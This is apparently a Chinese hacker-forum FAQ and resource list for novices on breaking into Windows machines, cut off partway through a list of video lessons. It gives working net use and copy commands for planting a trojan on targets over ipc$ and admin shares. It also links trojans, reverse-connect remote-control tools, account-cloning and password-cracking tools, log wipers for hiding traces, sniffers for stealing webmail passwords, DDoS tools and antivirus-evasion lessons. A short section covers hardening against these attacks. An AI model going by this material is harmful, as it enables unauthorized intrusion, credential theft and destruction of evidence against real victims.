错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限; 错误号51,windows 无法找到网络路径 : 网络有问题; 错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤); 错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$; 错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。 错误号1326,未知的用户名或错误密码 : 原因很明显了; 错误号1792,试图登录,但是网络登录服务没有启动 : 目标netlogon服务未启动。(连接域控会出现此情况) 错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。 4,关于ipc$连不上的问题比较复杂,本论坛没有总结出一个统一的认识,我在肉鸡上实验有时会得出矛盾的结论,十分棘手。 而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。问题过于细致后就不适合在本文章里探讨了。 各位看着办吧,呵呵。 3,怎样打开目标的ipc$? 答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话(比如有防火墙,杀不了)建议放弃。 4,怎样映射和访问默认共享? 答:使用命令 net use z: \\目标ip\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘,其他盘类推。 如果已经和目标建立了ipc$,则可以直接用ip加盘符加$访问。比如 copy muma.exe \\ip\d$\path\muma.exe 。或者再映射也可以,只是不用用户名和密码了:net use y: \\ip\d$ 。然后 copy muma.exe y:\path\muma.exe 。当路径中包含空格时,须用""将路径全引住。 5,如何删除映射和ipc$连接? 答:用命令 net use \\ip\ipc$ /del 删除和一个目标的ipc$连接。 用命令 net use z: /del 删除映射的z盘,其他盘类推。 用命令 net use * /del 删除全部。会有提示要求按y确认。 6,连上ipc$然后我能做什么? 答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具(比如pstools系列、 win2000srvreskit、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、vnc、remoteadmin等工具(木马)还具有直接控屏的功能。如果是 2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。 7,怎样防止别人用ips$和默认共享入侵我? 答:a、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。 1,先把已有的删除 net share ipc$ /del net share admin$ /del net share c$ /del …………(有几个删几个) 2,禁止别人空连接       首先运行regedit,找到如下主键[hkey_local_machine\system\currentcontrolset\control\lsa]把restrictanonymous(dword)的键值改为:00000002。      3,禁止自动打开默认共享      对于server版,找到如下主键[hkey_local_machine\system\currentcontrolset\services\ lanmanserver\parameters]把autoshareserver(dword)的键值改为:禁止。 对于pro版,则是[hkey_local_machine\system\currentcontrolset\services\lanmanserver\parameters]把autosharewks(dword)的键值改为:禁止。 如果上面所说的主键不存在,就新建一个再改键值。 b、另一种是关闭ipc$和默认共享依赖的服务(不推荐) net stop lanmanserver 可能会有提示说,xxx服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。 c、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。 d、还有一个办法就是装防火墙,或者端口过滤。防火墙的方法就不说了,端口过滤看这里: 过配置本地策略来禁止139/445端口的连接 http://www.sandflee.net/txt/list.asp?id=98 关于扫描出的漏洞 简单说明: 很多扫描器都有漏洞扫描功能。当你获得了一些主机的漏洞列表时,不要急着把它们帖在论坛上,期望别人来为你分析和告诉你利用的方法。你应该首先尝试自己完成这些。扫描出的漏洞并不是都有用的,一部分漏洞过时了,一部分是误报。 漏洞搜索: 绿盟的引擎 http://security.nsfocus.com/index.php?act=sec_bug 补天网的引擎 http://www.patching.net/otherweb/leak/leakindex.asp 小凤居的引擎 http://www.chinesehack.org/file/list.asp?type=2 相关帖子: cgi漏洞描述 http://www.sandflee.net/txt/list.asp?id=37 iis isapi printer远程溢出攻击 http://www.sandflee.net/txt/list.asp?id=66 如何利用unicode漏洞 http://www.heibai.net/article/show.php?id=2638 apache http server存在严重漏洞 http://www.sandflee.net/txt/list.asp?id=161 msadcs.dll漏洞的使用方法 http://www.sandflee.net/txt/list.asp?id=115 相关工具: iisidq snake的idq溢出攻击程序 http://www.heibai.net/download/show.php?id=223&down=1 iis .ida映射溢出程序 http://www.heibai.net/download/show.php?id=1508&down=1 关于提升权限 简单说明: 经典的黑客目标就是得到root(即win中的admin)权限。有些漏洞(典型的如unicode漏洞、asp木马)不能直接获得管理员权限,所以必然需要提升权限。一些新手可能会犯这类错误,以为中了木马、获得了shell就能控制一切。结果就出现“为何不能加用户”、“为何不能开3389”等问题。 2000及更高版本os承袭了nt的安全结构,多重机制环环相扣来保障安全,特别是帐户安全。无奈安全系统过于庞大,多少会出现漏洞,于是我们就有机会了。 相关工具: erunasx 利用debug registers漏洞提升权限 http://www.sandflee.net/down/show.asp?id=118&down=1 自带说明。需要指出的是,它的原理决定了它只能使用一次,不成功(比如打错了字)就必须重起目标,才能再来。 pipeupadmin 对sp1及更低有效 http://www.sandflee.net/down/show.asp?id=25&down=1 ispc 利用iis的漏洞,详见自带说明 http://www.heibai.net/download/show.php?id=1532&down=1 相关帖子: nt/2000提升权限的方法小结 http://www.sandflee.net/txt/list.asp?id=62 windows nt4的安全结构(对新手有些难,了解一下吧) http://www.sometips.com/tips/security/184.htm 关于做代理和跳板 相关工具: sockscap 2.2 socks调度工具 http://www.heibai.net/download/show.php?id=2410&down=1 sksockserver1.04 代理跳板 http://www.heibai.net/download/show.php?id=1194&down=1 ftp serv-u 4.0 最常用的ftp服务程序 http://soft.km169.net/soft/html/4237.htm slimftp 隐蔽的ftp服务器 http://www.netsill.com/download/download.asp?did=1981 天雁web服务器 不用安装的小型web服务程序 http://www.netsill.com/download/download.asp?did=1979 相关帖子: 代理、肉鸡、跳板的概念 http://www.s8s8.net/cgi-bin/topic.c...=14803&show=300 代理服务器(proxy)完全解析 http://www.sandflee.net/cgi-bin/lb5...um=1&topic=9092 如何使用代理服务器 http://netschool.ayinfo.ha.cn/rhsydlfwq.htm sockscap32 结合snakeskserver做跳板图解 http://www.sandflee.net/txt/list.asp?id=88 serv-u设置教程 http://www.enanshan.com/ftp/ sockscap32 使用详解 http://www.netsill.com/wenzhang/list.asp?id=66 关于终端服务(3389) 简单说明: windows 终端服务提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。图形界面和不影响当前本地用户的特性是它的最大优点。由于它是 2000server及以上版本自带的功能,因此成为一个绝好的“后门”而倍受青睐。而且win98也可以成为客户端,这使得在网吧“工作”成为可能。 相关工具: winxp下的客户端 功能比2000下的更强大 http://www.sandflee.net/down/show.asp?id=67&down=1 终端服务程序的一个补丁 使本地和远程间能复制文本 http://www.sandflee.net/wawa/tools/rdpclip_hotfix.exe web版终端客户端 使用浏览器调用activex控件访问终端服务 http://www.enanshan.com/down/tswebsetup.exe c3389.exe 修改终端服务端口号的工具 http://www.sandflee.net/down/show.asp?id=261 win2k终端服务器端所需文件包 http://www.netsill.com/download/download.asp?did=1965 相关帖子: 关于远程启动终端服务的帖子 http://www.s8s8.net/cgi-bin/topic.c...=25&topic=14567 终端服务问题常见问答 http://www.sandflee.net/wawa/3389qa.htm 图文讲解输入法漏洞入侵 http://www.sandflee.net/txt/list.asp?id=22 terminal service 远程安装 http://article.cnhope.org/list.asp?id=697 其他任何有关3389终端服务的问题都可以到专门的论坛和主页找答案: http://www.sandflee.net/wawa/ http://www.sandflee.net/cgi-bin/lb5...ms.cgi?forum=17 请不要在其他分论坛发贴提问。 关于克隆帐号 简单说明: 克隆帐号的原理简单的说是这样:在注册表中有两处保存了帐号的sid相对标志符,一处是sam\domains\account\users下的子键名,另一处是该子键的子项f的值中。这里微软犯了个不同步它们的错误,登陆时用的是后者,查询时用前者。当用admin的f项覆盖其他帐号的f项后,就造成了帐号是管理员权限但查询还是原来状态的情况。即所谓的克隆帐号。 具体的看这里:解剖安全帐号管理器(sam)结构 http://www.sandflee.net/cgi-bin/lb5...um=1&topic=5973 明白原理后就可以手动或者用现成的工具克隆帐号了。 相关工具: 克隆ca.exe http://www.netxeyes.org/ca.exe 检查克隆cca.exe http://www.netxeyes.org/cca.exe 手动克隆需要system权限,用它 psu.exe http://www.sandflee.net/down/show.asp?id=176&down=1 相关帖子: 工具克隆:ca和cca 请访问作者主页 http://www.netxeyes.org/main.html 这里是摘录 http://www.sandflee.net/cgi-bin/lb5...um=1&topic=3374 psu用法:psu.exe提升为system权限 http://www.sandflee.net/cgi-bin/lb5...um=1&topic=5638 手动克隆:如何克隆管理员帐号 http://www.sandflee.net/txt/list.asp?id=138 如何克隆管理员帐号的补充 http://www.sandflee.net/txt/list.asp?id=139 常见问题和回答: 1,使用ca时,出现connect **.**.**.** ...error是怎么会事? 答:ca和cca需要目标开放ipc$,请确认可以与目标建立ipc$。参见“关于ipc$和空连接” 2,使用ca时,出现“processing....error”是怎么会事? 答:这说明对方主机缺少文件msvcp60.dll,想办法传个过去放在系统目录下就可以了。 3,克隆过程没有错误,但cca没有显示该帐号克隆成功,无法使用被克隆的帐号。 答:这一般是因为对方主机是域控制器,注册表中sam结构不同,工具失效。暂时无法解决。 4,手动克隆无法访问注册表sam键怎么办? 答:在命令行方式,可以使用psu工具获得system权限,从而访问sam键。详见上面说明。 在图形界面,运行regedt32.exe,找到sam键并选中。“安全”子菜单栏里有一项“权限”,打开它。在里面设置administrator和system一样有完全控制权限。刷新,然后用regedit等就可以访问sam键了。 关于日志 简单说明: 想要做个隐身人就要把脚印擦干净。windows的许多服务都带日志。最重要和明显的就是iis和事件日志。它们最有可能记录你的ip和行动。而且相对于其他的如ftp、计划任务、telnet的日志更为管理员重视。另外,如果你获得了图形界面的shell来用ie,还可能会留cookie。 相关工具: cleaniislog 清除web日志 http://www.netxeyes.org/cleaniislog.zip elsave.exe 清除事件日志 http://www.sandflee.net/down/show.asp?id=196 rcls.vbe 远程清除事件日志的脚本 http://home.getdns.net/web/eva/zzzevazzz/rcls.zip 相关帖子: nt/2000下删日志的方法 http://www.sandflee.net/txt/list.asp?id=129 windows日志的保护与伪造 http://www.sandflee.net/txt/list.asp?id=182 关于后门和木马 相关工具: wollf-v1.5 功能挺多的木马 http://www.isgrey.com/down/show.asp?id=144&down=1 winshell v5.0 精巧的telnet服务器 http://www.isgrey.com/down/show.asp?id=200&down=1 蓝色火焰v0.5 可以用ie控制的木马 http://www.bluefate.com/bluefire/bluefire050.zip 网络神偷 v3.4 反向连接,上线通知 http://www.isgrey.com/down/show.asp?id=239&down=1 hell v0.4 lion写的木马兼工具 http://www.heibai.net/download/show.php?id=2449&down=1 相关帖子: 蓝色火焰v0.5介绍 http://www.bluefate.com/bluefire/help.htm 网络神偷的介绍,直接去作者的主页找 http://www.greenstuffsoft.com/nethief/article.htm 关于打补丁 简单说明: 如果你发现肉鸡有漏洞的话,一般可以用上面提到的漏洞搜索引擎找到相应的补丁下载url。大的补丁比如sp2就找微软要吧(windows update)。 相关帖子: 肉鸡补丁教程 http://www.sandflee.net/cgi-bin/lb5...um=1&topic=7180 相关工具: win2000sp3中文版 http://www.cnns.net/msfix/w2ksp3_cn.exe win2000sp3英文版 http://www.cnns.net/msfix/w2ksp3_en.exe windows2k安全补丁集srp1 http://www.patching.net/otherweb/so...cle.asp?id=1570 关于telnet 简单说明: telnet 是一种命令行方式的终端服务,其优势在于客户端和服务端都是系统自带的。它是除了木马外,获得cmd下shell的最好选择。使用该服务时,最常遇到的问题就是ntlm认证方式。当ntlm=2时,要求你必须使用你系统当前的帐户和密码登陆;当ntlm=0时直接要求你输入帐户及密码进行验证;ntlm= 1则是前一种要求失败后再用后一种。由于系统默认的ntlm为2,所以想用你得到的帐户登陆,要么在自己系统上也建立一个用户名密码都一样的帐户,要么想办法更改对方的ntlm。 相关工具: telnethack 远程开启telnet服务 http://www.heibai.net/download/show.php?id=2200&down=1 rtcs.vbe 远程开telnet的脚本(不用ipc$) http://home.getdns.net/web/eva/zzzevazzz/rtcs.zip 相关帖子: 最快速登录win2k telnet 服务 http://www.sandflee.net/txt/list.asp?id=58 不需工具远程屏蔽telnet服务的ntlm认证 http://www.sandflee.net/cgi-bin/lb5...=8608&show=1012 关于ftp入侵 简单说明: ftp 是文件传输协议的缩写,现在一般指一种文件传输方式。要通过它入侵实在是有些勉为其难了。即使得到上传权限也无法直接执行程序,利用办法可以参考 win98共享的入侵。一些较早版本的ftp服务软件,尤其是unix平台上的,有溢出或越权访问的漏洞,相关信息请查看后面关于漏洞的部分。 相关帖子: 允许匿名登陆ftp服务器危险性研究 http://www.heibai.net/article/show.php?id=2094 关于sql 简单说明: sql 的原意是structured query language,结构化查询语言。现一般指代数据库软件或服务。流行的数据库软件是ms-sql,一般服务器上都由它提供数据库服务。以下的讨论都是针对它的。由于具有管理员权限的帐号sa默认密码为空,且低版本的sql有漏洞能直接获得密码。因此它也成为入侵的一种捷径(如果存在漏洞的话)。用客户端工具连接后直接当cmd用吧。 相关工具: mssqltools 攻击sql的工具集 http://www.haowawa.com/down/att/mssqltools.zip supersqlexec mssql连接工具 http://www.sandflee.net/down/show.asp?id=142&down=1 相关帖子: 去除sa的xp_cmd hell权限 http://www.sandflee.net/txt/list.asp?id=148 dos下如何改sql密码 http://www.sandflee.net/cgi-bin/lb5...=8623&show=1034 sql扩展的删除与恢复 http://www.haowawa.com/bbs/dispbbs....id=16971&page=1 sql完全简明手册 http://www.patching.net/otherweb/wo...cle.asp?id=1513 关于sniffer 相关工具: arpsniffer 基于交换环境的sniffer工具 http://www.netxeyes.org/arpsniffer.rar snifferpro4.6 最好的嗅探器之一 http://www.sandflee.net/down/show.asp?id=237&down=1 commview 也是嗅探器 http://www.skycn.com/download.php?i...et/down/cv3.zip arpkiller1.3 可以查谁在嗅探(网卡处在混杂模式) http://www.heibai.net/download/show.php?id=2547&down=1 pswmonitor2.0 监听基于网页的邮箱密码(很适合在网吧使用) http://www.heibai.net/download/show.php?id=2181&down=1 guniffer 命令行方式的嗅探工具 http://haowawa.com/down/guniffer.exe 相关帖子: sniffer简述 http://www.sandflee.net/txt/list.asp?id=177 网络监听技术概览 http://www-900.ibm.com/developerwor...iff/index.shtml netxray使用说明总汇 http://www.heibai.net/article/show.php?id=1620 如何在交换环境下sniffer http://www.netxeyes.org/arpsniffer.html windows 交换环境下arp sniffer的实现 http://www.netxeyes.org/arpspoof.html 关于dos和ddos 简单说明: 拒绝服务攻击只在很特殊的情况才有应用价值。它完全是一种破坏和令人厌恶的行为。因此十分不推荐新手尝试。各位了解一下它的原理就可以了。 相关工具: 独裁者 ddos工具 http://www.leothreads.com/usr/25/25_18196.zip 三个ddos工具 http://www.heibai.net/download/show.php?id=2706&down=1 相关帖子: dos攻击原理以及常见方法介绍 http://www.heibai.net/article/show.php?id=1724 典型dos攻击原理及抵御措施 http://www.heibai.net/article/show.php?id=1523 分布式拒绝服务攻击(ddos)原理及防范 http://www-900.ibm.com/developerwor...dos/index.shtml dos,ddos(拒绝服务)攻防简明问答 http://www.chinesehack.org/file/show.asp?id=4876 独裁者(autocrat)教程 http://www.s8s8.net/cgi-bin/topic.c...ic=17639&show=0 关于unix/linux 简单说明: unix/linux无疑是比windows更历史悠久更出色的os。可惜缺少了一些“平易近人”,让许多人望而却步。这里也不打算讲些什么,想学它的人不如从学习怎么找相关资料开始吧,呵呵。 相关帖子: 给初学者的入侵faq http://article.cnhope.org/list.asp?id=308 rootkit综述 http://www.patching.net/otherweb/wo...cle.asp?id=1592 相关网址: linux相关网站集 http://chenbol.myetang.com/remen.htm 关于常用工具的使用 简单说明: 黑客的工具就像战士的枪,一定要熟练掌握灵活应用。这里给出一些常用的工具方便新手下载。其他工具还是自己搜一下吧。一般命令行下的工具是自带简单的使用说明(即usage)的,当输入错误参数或不输参数就会显示。不要因为帮助是英文的就放弃学习。给出的软件使用教程,总会有没讲到或讲的不够细致的地方。遇到问题请首先尝试自己解决。实在不行的话,就请把握住问题的要点,清楚地表达出来。 相关工具: 命令行工具: shutdown.exe 远程重起的小工具 http://www.sandflee.net/down/show.asp?id=109&down=1 pstools系列工具 包括pslist,pskill,psinfo等实用的工具 http://haowawa.com/down/pstools.zip 内有英文说明,比较易懂。 smbcrack v4 暴力破解2000共享密码 http://www.sandflee.net/down/show.asp?id=226&down=1 sc.exe 服务管理工具 http://www.sandflee.net/down/show.asp?id=31&down=1 nmap-3.00-win32 最优秀的扫描工具 http://www.heibai.net/download/show.php?id=2741&down=1 regshell 命令行方式下的交互式注册表编辑工具 http://www.sometips.com/soft/regshell.exe scanlook 1.0 漏洞扫描器 http://www.chinesehack.org/down/show.asp?id=1559&down=1 win2k.svr.reskit完全安装版 微软出的“黑客”工具包 http://www.ttian.net/download/show.php?id=136&down=1 nc 黑客的瑞士军刀 http://www.sandflee.net/down/show.asp?id=32&down=1 图形界面工具: superscan3.0 端口扫描,速度快 http://www.sandflee.net/down/show.asp?id=165&down=1 x-scan 2.0 综合扫描工具 http://www.sandflee.net/down/show.asp?id=236&down=1 tftp服务器 简单的文件传输工具,利用unicode漏洞必备 http://www.sandflee.net/down/show.asp?id=27&down=1 dameware nt utilities v3.62注册版 强大的远程控制软件 http://www.sandflee.net/down/show.asp?id=238&down=1 l0pht4.0 破解sam的著名工具(带注册机) http://www.sometips.com/soft/lc400.zip strcm-vnc strcm自动装载vnc远程图形控制 http://www.sandflee.net/down/show.asp?id=235&down=1 remote administrator v2.1 远程控屏工具 http://www.sandflee.net/down/show.asp?id=204&down=1 相关帖子: superscan使用详解 http://www.heibai.net/article/show.php?id=1575 使用strcm自动装载vnc远程图形控制 http://www.sandflee.net/txt/list.asp?id=176 dameware nt utilities 使用心得 http://www.sandflee.net/txt/list.asp?id=102 dameware nt utilities图文教程 http://www.sandflee.net/txt/list.asp?id=25 remote administrator--远程控制软件图文使用教程 http://www.sandflee.net/txt/list.asp?id=162 remote administrator 官方中文帮助 http://www.sandflee.net/txt/list.asp?id=165 关于 radmin 的远程安装 http://www.ttian.net/article/show.php?id=431 sc介绍和教程 http://www.sandflee.net/txt/list.asp?id=26 代理猎手(proxy hunter)使用教程 http://wwwb.pconline.com.cn/pcedu/soft/doc/10312/1.htm nmap详细使用说明 http://home.getdns.net/web/eva/nmap.txt 关于教程 我收集了一些教程的下载地址。看教程重要的是学会其中的思路和创新,消化吸收成为自己的东西,并举一反三。不要当它们是资料库,要用时是很难找到想找的文章的。不同教程里会有文章重复,就当是强化记忆再看一遍。 (排名不分先后,^_^) 小西的黑客教程(菜鸟版) http://www.sandflee.net/down/show.asp?id=213&down=1 流光教程电子版 http://www.sandflee.net/down/show.asp?id=34&down=1 三陀工作室整理的delphi和黑客技巧1.5 http://stgzs.myetang.com/hack/delphitechv1.5.chm 终端服务的电子书 http://www.sandflee.net/wawa/ tools/termsrv.zip ncc制作的超级菜鸟黑客速成 http://www.heibai.net/download/show.php?id=2136 溯雪 光影 小榕 论坛精华集 http://www.andyxu.net/banana/tools/netxeyes.chm 安全焦点文档精华 http://www.andyxu.net/banana/tools/xfocus_doc.rar 鹰派的网络经典教材 http://www.sandflee.net/down/show.asp?id=63&down=1 rick的unix教材 http://www.sandflee.net/down/show.asp?id=153&down=1 幻影旅团 团长:刺 写的黑客教程 http://mybanqiao.jia.net/rije/banana/tools/hy.rar 菜牛兄写的汉化与破解软件教程 http://mybanqiao.jia.net/rije/banana/tools/niu.rar 单机安装web服务,ftp服务,imail邮件服务,和超级雷傲论坛全攻略 http://www.andyxu.net/banana/tools/web.chm 雾中鸟的《系统网络入侵方法小结》 http://www.sandflee.net/down/show.asp?id=114&down=1 傲气雄鹰的教程 http://scfly.3322.net/ 轰天炮写的黑客入门 http://mybanqiao.jia.net/rije/banana/tools/htp.rar 《黑客攻防指南》第一期 http://www.heibai.net/download/show.php?id=2216&down=1 小铭写的《网络最菜黑客指南》 http://www.heibai.net/download/show.php?id=1808&down=1 黑客防线全站教程 http://www.andyxu.net/banana/tools/banana_01.rar 菜鸟宝典 http://www.haowawa.com/down/cainiao.zip 黑客基础教材 论坛成员沉睡不醒收集制作 http://www.sandflee.net/down/show.asp?id=241&down=1 都是黑客防线的 第57课]利用'or''=''or'拿shell http://vipsoft1.hacker.com.cn/vip1-down/yuyin/or1.rar [第56课]桃源网盘Cookie欺骗漏洞 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/taocooking.rar [第55课]PHPWind跨站、注入双重漏洞录像 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/phpwind.rar [第54课]桃源网络硬盘漏洞的录像 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/1.rar [第53课]有dbowner权限就有webshell http://vipsoft1.hacker.com.cn/vip1-down/yuyin/dboder.rar [第52课]动感下载注入漏洞 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/donggan.rar [第51课]黑防鸽子免杀江民的攻克 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/gezijiang.rar [第50课]各种反弹木马内网上线 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/fanmu.rar [第49课]网吧也玩LINUX http://vipsoft1.hacker.com.cn/vip1-down/yuyin/wangba.rar [第48课]上兴远程控制3.3主程序免杀制作 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/shangxing.rar [第47课]突破限制下载黑防在线教程 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/tupo.rar [第46课]smi格式的文件做免杀处理 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/smimian.rar [第45课]注册表也减肥 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/jianfei.rar [第44课]木马绝对免杀录象 http://vipsoft1.hacker.com.cn/vip-down/donghua/20060220/mumam.rar [第43课]QQ强行加别人为好友 http://vipsoft1.hacker.com.cn/vip- ... 20060219/aaqiang.rar [第42课]注入清华同方 http://vipsoft1.hacker.com.cn/vip- ... 20060210/zhutong.rar [第41课]鸽子cserver.dat免杀演示 http://vipsoft1.hacker.com.cn/vip- ... 20060209/cserver.rar [第40课]制作ASP木马免杀(菜鸟版+语音) http://vipsoft1.hacker.com.cn/vip ... /20060208/aspsha.rar [第40课]利用QQ过天网防火墙 http://vipsoft1.hacker.com.cn/vip ... /20060121/tianqq.rar [第39课]webremote使用 http://vipsoft1.hacker.com.cn/vip- ... 0060112/webremote.rar [第38课]网吧破解动画 http://vipsoft1.hacker.com.cn/vip- ... 0060111/wangbapo.rar [第37课]l-bolg利用 http://vipsoft1.hacker.com.cn/vip1-down/l-bolg.rar [第36课]Windows最新漏洞WMF溢出演示 http://vipsoft1.hacker.com.cn/vip1-down/WMF.rar [第34课]ping的使用 http://vipsoft1.hacker.com.cn/vip1-down/ping.rar [第35课]手脱壳 http://vipsoft1.hacker.com.cn/vip1-down/whmw.rar [第33课]菜鸟收费歌曲免费下载 http://vipsoft1.hacker.com.cn/vip1-down/killer.rar [第32课]无法使用cmd的解决办法 http://vipsoft1.hacker.com.cn/vip1-down/cmd.rar [第31课]自己制作IE搜索工具条 http://vipsoft1.hacker.com.cn/vip1-down/zhizuoie.rar [第30课](新的)MSSQL扩展存储后门的使用 http://vipsoft1.hacker.com.cn/vip1-down/mssqlk.rar [第29课]VB简单实现QQ聊天 http://vipsoft1.hacker.com.cn/vip1-down/vbliao.rar [第28课]不用FTP刷新IP文件 http://vipsoft1.hacker.com.cn/vip1-down/buftp.rar [第27课]webremote使用 http://vipsoft1.hacker.com.cn/vip1-down/webremote1.rar [第26课]CnSpider的linux安装演示一 http://vipsoft1.hacker.com.cn/vip1-down/linux1.rar [第26课]硬盘分区的神 http://vipsoft1.hacker.com.cn/vip1-down/yingpanfenqu.rar [第25课]升级免费拿QB不会封 http://vipsoft1.hacker.com.cn/vip1-down/mianQQ.rar [第24课]BlackICE使用动画 http://vipsoft1.hacker.com.cn/vip1-down/blackice.rar [第23课]MDaemon8漏洞 http://vipsoft1.hacker.com.cn/vip1-down/MDaemon8.rar [第22课]MDaemon7漏洞 http://vipsoft1.hacker.com.cn/vip1-down/MDaemon7.rar [第21课]网吧破解动画教程 http://vipsoft1.hacker.com.cn/vip1-down/wangbapo.rar [第20课]溯雪网页爆破的神兵利器 http://vipsoft1.hacker.com.cn/vip1-down/sxwp.rar [第19课]ServU密码分析及破解 http://vipsoft1.hacker.com.cn/vip1-down/server-uj.rar [第18课]破解Pcanywhere密码 http://vipsoft1.hacker.com.cn/vip1-down/pcAnywhere.rar [第17课]攻防实验室第一关另类过关方法 http://vipsoft1.hacker.com.cn/vip1-down/lab.rar [第16课]堕落青年:免杀之花指令 http://vipsoft1.hacker.com.cn//vip1-down/hua.rar [第15课]破解QQ四国军旗刷分器 http://vipsoft1.hacker.com.cn/vip1-down/sgjq.rar [第14课]实战入侵虚拟主机 http://vipsoft1.hacker.com.cn/vip1-down/dylx.rar [第13课]克隆2003管理员 http://vipsoft1.hacker.com.cn/vip1-down/kelong2003.rar [第12课]脱动易2005漏洞利用工具壳 http://vipsoft1.hacker.com.cn/vip1-down/tk.rar [第10课]脚本入侵实例录象 http://vipsoft1.hacker.com.cn/vip1-down/jiaoben.rar [第49课]配置RQS http://vipsoft.hacker.com.cn/vip-down/200610/RQS.rar [第48课]百度搜索你是我的红娘 http://vipsoft.hacker.com.cn/vip-down/200610/hongniang.rar [第47课]梦幻木马使用教程 http://vipsoft.hacker.com.cn/vip-down/200610/mhmm.rar [第46课]木马网络特征分析 http://vipsoft.hacker.com.cn/vip-down/200610/mmfx.exe [第45课]挂马新方法 http://vipsoft.hacker.com.cn/vip-down/200610/gmxff.rar [第44课]淡紫深蓝过全系统网马演示 http://vipsoft.hacker.com.cn/vip-down/200610/dzsl.rar [第43课]中秋节刷QQ业务(会员+四钻) http://vipsoft1.hacker.com.cn/vip1-down/200610/zqqq.rar [第42课]快捷地查看QQ好友加密相册的置顶相片 http://vipsoft1.hacker.com.cn/vip1-down/3000/20060430/kanqq.zip [第41课]win2000 server vpn 设置 http://vipsoft1.hacker.com.cn/vip1-dow ... funny_win2k_vpn_nat.rar [第40课]黑防VIP下载加速 http://vipsoft1.hacker.com.cn/vip1-down/tgxz.rar [第39课]轻松拿网站WebShell http://vipsoft1.hacker.com.cn/vip1-down/nser1.rar [第38课]磁盘,文件和注册表监视工具的使用 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/monitor.rar [第37课]几款实用计算机安全软件使用 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/tools-1.rar [第36课]自启动项目查看分析动画 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/autoruns.rar [第35课]建立VPN连接加速网通与电信的互相访问 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/VPN.rar [第34课]扫描系列之一:讲解TCP三次握手,ICMP,ARP,UDP http://vipsoft1.hacker.com.cn/vip1-down/yuyin/protocol.rar [第33课]攻防系列之二:metasploit framework 教程 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/metasploit.rar [第32课]攻防系列之一:netcat教程 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/netcat.rar [第31课]个人电脑维护系列之一:如何使您的电脑在上网冲浪 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/virus.rar [第31课]动态网站建设之数据库的读取 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/dongrtai.rar [第30课]log parser使用动画(二) http://vipsoft1.hacker.com.cn/vip1-down/yuyin/log%20parser.rar [第29课]log parser使用动画(一) http://vipsoft1.hacker.com.cn/vip1-down/yuyin/logparser.rar [第28课]Google Hack(三) http://vipsoft1.hacker.com.cn/vip-do ... 60221/googlehack3.rar [第27课]Google Hack(二) http://vipsoft1.hacker.com.cn/vip-do ... 60220/Googlehack2.rar [第26课]Google Hack(一) http://vipsoft1.hacker.com.cn/vip-do ... 60219/Googlehack1.rar [第25课]WMI系列教程(三) http://vipsoft1.hacker.com.cn/vip-down/donghua/20060210/WMI-3.rar [第24课]WMI系列教程(二 http://vipsoft1.hacker.com.cn/vip-down/donghua/20060209/WMI-2.rar [第23课]WMI系列教程(一) http://vipsoft1.hacker.com.cn/vip-down/donghua/20060208/WMI-1.rar [第23课]配置SNMP代理 http://vipsoft1.hacker.com.cn/vip-down/donghua/20060207/1snmp.rar [第23课]服务器架设教程 http://vipsoft1.hacker.com.cn/vip ... /20060206/server.rar [第22课]X-SCAN使用动画 http://vipsoft1.hacker.com.cn/vip- ... 20060123/2X-Scan.rar [第21课]嗅探真实的下载地址或者铃声地址 http://vipsoft1.hacker.com.cn/vip- ... 20060120/sniffer.rar [第20课]通用病毒清除方法-sc.exe,netsvc.exe的使用 http://vipsoft1.hacker.com.cn/vip ... /20060118/clean3.rar [第19课]通用病毒清除方法-killbox,IceSword,tips http://vipsoft1.hacker.com.cn/vip ... /20060117/clean2.rar [第18课]命令行工具来替换被锁定的操作系统文件一 http://vipsoft1.hacker.com.cn/vip ... /20060116/clean1.rar [第17课]代理服务器架设以及术语解释2 http://vipsoft1.hacker.com.cn/vip ... /20060113/proxy2.rar [第16课]代理服务器架设以及术语解释 http://vipsoft1.hacker.com.cn/vip1-down/proxy.rar [第15课]批处理实例解析 http://vipsoft1.hacker.com.cn/vip1-down/bateg.rar [第13课]for命令解析 http://vipsoft1.hacker.com.cn/vip1-down/for.rar [第12课]批处理教学(2) http://vipsoft1.hacker.com.cn/vip1-down/pi2.rar [第11课]批处理教学(1) http://vipsoft1.hacker.com.cn/vip1-down/pi1.rar [第10课]个人电脑安全及性能优化 